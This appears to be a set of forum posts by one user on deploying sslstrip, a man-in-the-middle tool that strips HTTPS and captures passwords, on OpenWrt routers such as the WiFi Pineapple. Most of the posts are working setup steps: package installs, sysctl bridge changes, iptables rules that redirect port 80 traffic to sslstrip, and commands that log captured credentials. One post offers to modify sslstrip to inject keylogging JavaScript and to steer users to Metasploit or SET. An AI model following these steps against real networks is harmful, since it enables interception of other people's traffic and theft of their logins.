thaihenry

For anyone interested, I got sslstrip .9 working by remarking the following lines so that the deprecate module is not requried: nano /opt/usr/lib/python2.7/site-packages/twisted/web/__init__.py # -*- test-case-name: twisted.web.test -*- # Copyright © Twisted Matrix Laboratories. # See LICENSE for details. """ Twisted Web: a L{web server} (including an L{HTTP implementation} and a L{resource model}) and a L{web client}. """ from twisted.web._version import version from twisted.python.versions import Version #from twisted.python.deprecate import deprecatedModuleAttribute __version__ = version.short() #deprecatedModuleAttribute( # Version('Twisted', 11, 1, 0), # "Google module is deprecated. Use Google's API instead", # __name__, "google")

I don't think it is a problem with sslstrip, although updating to version 8 helps The main problem is that bridging is not turned on. To turn it on: vi /etc/sysctl.conf Change to: # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 Should only be one IP redirect: iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 ssltrip is a proxy which means that you ca do all kinds of things with it besides getting passwrds.!!!

Interesting, I definitely have it working on my wr703n with the latest version of openwrt (development). I am pretty sure I had it working on the Mark4 also. Did you reboot? I wonder if there are different versions of the firmware? Is your linux version 3.3?

Yes that is correct, I have not done much testing on it otherwise. You just need to manually install the prerequisites as having SET install them for you will not work. Also have quite a few other python tools working great like mitmproxy

See my earlier post on this. By default iptables does not work on a bridge interface for openwrt. see my earlier post on sslstrip on how to fix that. Frankly I don't see how anyone can get sslstrip working on the Jasager without this fix.

urlsnarf listens only on port 80 and 8080. Once you start sslstrip, traffic is redirected to port 10000 by default, so urlsnarf does not see any traffic. I have not tried it, but get sslstrip to run on port 8080, urlsnarf may then pick up the traffic.

In case you cannot exchange them, keep in mind that as long as you are running openwrt, there is still a lot that you can do with the boards. Most of the utilities will run fine from the command line, however you will not get the pineapple firmware (interface) on it. I would be interested to know if 16 Megs memory is enough to run SSLstrip properly though.

Instead of using ettercap, (the filters don't work properly) use sslstrip to write an iframe in the response body. If you provide me with your java script code, I can modify sslstrip for you to do that, so that your sslstrip module will also do key logging! This can also be taken further to do all kinds of things like for example sending users to a computer running metasploit, set etc. while you are at it might as well do a SET module since I have SET working on my router.

For existing users of the Pineapple that want to get sslstrip working properly: 1. edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!) change the 0 to 1 in the following section: vi /etc/sysctl.conf # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 2. Depending on what version you have make sure that the firewall is disabled. 3. Install the following packages in case they were never installed: opkg -dest usb install python opkg -dest usb install zope-interface opkg -dest usb install twisted-web opkg -dest usb install pyopenssl If you want to get the latest version of sslstrip: 4. Download sslstrip: wget http://www.thoughtcr...trip-0.6.tar.gz tar zxvf sslstrip-0.6.tar.gz cd sslstrip-0.6 5. Fixes to get sslstrip working properly: ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7 touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py 6. If you are using the sslstrip module then you will need to install sslstrip: python setup.py install otherwise you can just run it from the command line: iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 python sslstrip.py -a -k -f -w /usb/log.txt

To answer my own post and get the latest version of sslstrip (v.9) working: Comment out lines 97 and line 98 of ServerConnection.py in the sslstrip sub-folder. # elif (key.lower() == 'set-cookie'): # self.client.responseHeaders.addRawHeader(key, value) However I have tested vesions 6-9 of sslstrip, while version 8 and 9 work, there is a problem (only on openwrt) that prevents the web page being loaded after passwords have been captured. most likely because "Compatibility changes for recent versions of twisted" Which means that twisted is not the latest version on openwrt. Versions 6-7 work fine. Also killsessions that never worked properly for me on versions 8 and 9 does seem to work good on 6 and 7!

This is a guide on how to get sslstrip working on openwrt. This should work on ANY router that supports openwrt with USB ports and 32 MB of memory or more. A fast CPU would help, however sslstrip runs fine on 400 mgz CPU. I have tested this on the pineapple mark 4 and on the tplink WR703N 1. Make sure you install a firmware with a version 3.0 or greater kernel. At this time only the development snapshots (firmware) of openwrt have linux 3.3 iptables may not be properly supported on earlier versions. 2. Install USB support, this is very well documented elsewhere on this site 3. edit /etc/profile vi /etc/profile a. Change the existing path statement to the following: export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/opt/bin:/opt/sbin:/opt/usr/bin:/opt/usr/sbin b. Add this line: export LD_LIBRARY_PATH=/lib:/usr/lib:/opt/lib:/opt/usr/lib 4. edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!) change the 0 to 1 in the following section: vi /etc/sysctl.conf # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 5. Disable the firewall using the command line or web interface. (or modify iptables for proper routing) 6. Install the following packages: opkg -dest usb install python opkg -dest usb install zope-interface opkg -dest usb install twisted-web opkg -dest usb install pyopenssl Optional but very usefull: opkg -dest usb install nano opkg -dest usb install screen -dest usb may be different on your router depending on how you setup your usb disk and swap. Don't forget to add dest usb /usb in your software configuration. 7 Download sslstrip: wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz tar zxvf sslstrip-0.6.tar.gz cd sslstrip-0.6 8. Fixes to get sslstrip working properly: ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7 touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py Optional for nano and screen: ln -s /usb/usr/share/terminfo /usr/share/terminfo 9. to get sslstrip running: iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 python sslstrip.py -a -k -f -w /usb/log.txt Once you have everything working properly, you can install sslstrip as usual (python setup.py install) so that you can use your favorite scripts on openwrt.

Just in case someone can take this further, this is the error message when running version 9 after a few seconds: sslstrip 0.9 by Moxie Marlinspike running... Traceback (most recent call last): File "/opt/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/opt/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/opt/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/opt/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) --- <exception caught here> --- File "/opt/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite why = getattr(selectable, method)() File "/opt/usr/lib/python2.7/site-packages/twisted/internet/tcp.py", line 362, in doRead return self.protocol.dataReceived(data) File "/opt/usr/lib/python2.7/site-packages/twisted/protocols/basic.py", line 232, in dataReceived why = self.lineReceived(line) File "/opt/usr/lib/python2.7/site-packages/twisted/web/http.py", line 388, in lineReceived self.handleHeader(key, val) File "/usb/sslstrip-0.9/sslstrip/ServerConnection.py", line 98, in handleHeader self.client.responseHeaders.addRawHeader(key, value) exceptions.AttributeError: ClientRequest instance has no attribute 'responseHeaders'

According to moxie, these are the changes that he made: Changes in 0.8 (04/24/11) Major speed enhancements. Compatibility changes for recent versions of twisted. Support for stripping URLs with explicit port specifications (ie: foo.com:443) A number of small bug fixes. Changes in 0.7 (12/18/09) Fixed a minor bug that could prevent favicon spoofing from working correctly (thanks Simon Nicolussi). Changes in 0.6 (9/22/09) Fixed a silly bug in specifing the listen port with -l Here is how to get is working: cd /usb wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz tar xfv ssl* cd ssl* You can either run sslstrip version 8 directly or you can install it in the system. to run without installing: iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000 python sslstrip.py -k -f -w /usb/sslstrip.log I like to use screen so that I can run sslstrip in one screen and then see the output in other: tail /usb/sslstrip.log -f to install sslstrip: python setup.py install

sslstrip version 8 is running perfect on openwrt there is a problem with the latest version 9 off sslstrip: root@OpenWrt:/usb/sslstrip-0.9# python sslstrip.py Traceback (most recent call last): File "sslstrip.py", line 27, in <module> from twisted.web import http File "/opt/usr/lib/python2.7/site-packages/twisted/web/__init__.py", line 14, in <module> from twisted.python.deprecate import deprecatedModuleAttribute ImportError: No module named deprecate I tried installing the zope.deprecate module with no luck.

I think I found a solution but I need others to also test this. By default iptables does not work on the bridge interface br-lan. it is turned off and any redirect command will have no effect. https://forum.openwrt.org/viewtopic.php?pid=143700#p143700 I have edited /etc/sysctl.conf: # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 and redirect to port 10000 now works properly iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000 on the pineapple I believe the firewall is turned off, if you are using other versions of openwrt you will need to turn off the firewall (or modify the rules) so that traffic gets properly routed to the internet.

talot, Thank you for your input, Are you saying that if you don't redirect port 443 to 10000 that sslstrip does not work? That would be very interesting. I am trying to get sslstrip working on the pineapple without ICS and with the IP address changed to my local LAN going through a different lan router just the same as if I was running sslstrip on my laptop. But no luck so far. I have had no problem in the past getting sslstrip to work on a regular computer. Just wondering if IP tables has some kind of bug on this version of Linux (since I have the same problem on the stock openwrt firmware on the tplink 703 a similar router) or is it that I am ignorant about the way that routers work, and sslstrip needs to have different settings when run on a router? Any help would be appreciated and would help to expand the different ways that the pineapple could be used as I don't see much benefit from running sslstrip when you have to connect to ICS on another computer. In that case why not just run sslstrip from that computer?

I think you are mistaken, sslstrip does not decrypt anything. It is a transparent proxy that fools the client and server into thinking that they are exchanging information using encryption. If you are going to quote a web page might as well be the author of the tool: Moxie Marlinspike http://www.thoughtcrime.org/software/sslstrip/ How does this work? First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example). At this point, sslstrip receives the traffic and does its magic. His site has clear details of how this works. There is no mention of redirecting taffic from port 443 to the sslstrip port. That would not be possible because ssl traffic cannot be decrypted without a key. From my understanding sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. You can do the same thing with other transparent proxies.

Digininja Thank you for your help. Tplink has a very nice atheros based USB adapter; TL-WN722N. Very good for injection. I found them to be more reliable than the alphas, which I rarely use.

Hi Telot Why would this be necessary? This is ssl traffic and can't be decrypted: iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000 Also I am having a problem with direction iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 It seems that only the traffic from browsing the pineapples interface gets redirected to port 10000, not the traffic going through the router. Unfortunately I don't know enough about IP tables to fix this problem. Any help would be appreciated. Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used?

Thank you for your reply and your work on this module, however unfortunately it does not work for me. It did work when the network settings were set default and I was using ICS. But I need to use it standalone on a lan without going through a computer. I looked through the bash script and the PHP code and only found the one standard iptable redirect rule. Did the installation of the module also add some code or config changes somewhere else outside the module? Would appreciate if you can help me get this working standalone, on a lan without a computer runing ICS. When I run sslstrip manually, and use iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 for some reason the traffic does not get directed to port 10000. It flows right through.

What ip tables rules did you use to get sslstrip working on a local lan (no ICS) when I use the standard rule: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 no traffic seems to be rerouted to sslstrip (except the traffic from the web interface) I should add that my pineapple's address is 192.168.0.xx with the gateway on the same LAN and internet access works fine. I would think that the main purpose of having sslstrip on a router is to not have to use a computer for internet connection and either connect directly to a LAN through ethernet, using 3G or as a repeater using wifi. Also is there any reason why version 6 of sslstrip is being used? I can run the latest version with no problem, but again the traffic is not being routed to port 10000 with the above ip rule. Thanks in advance

Thai

How about that step-by-step guide, would be very helpful for everyone else with a mac.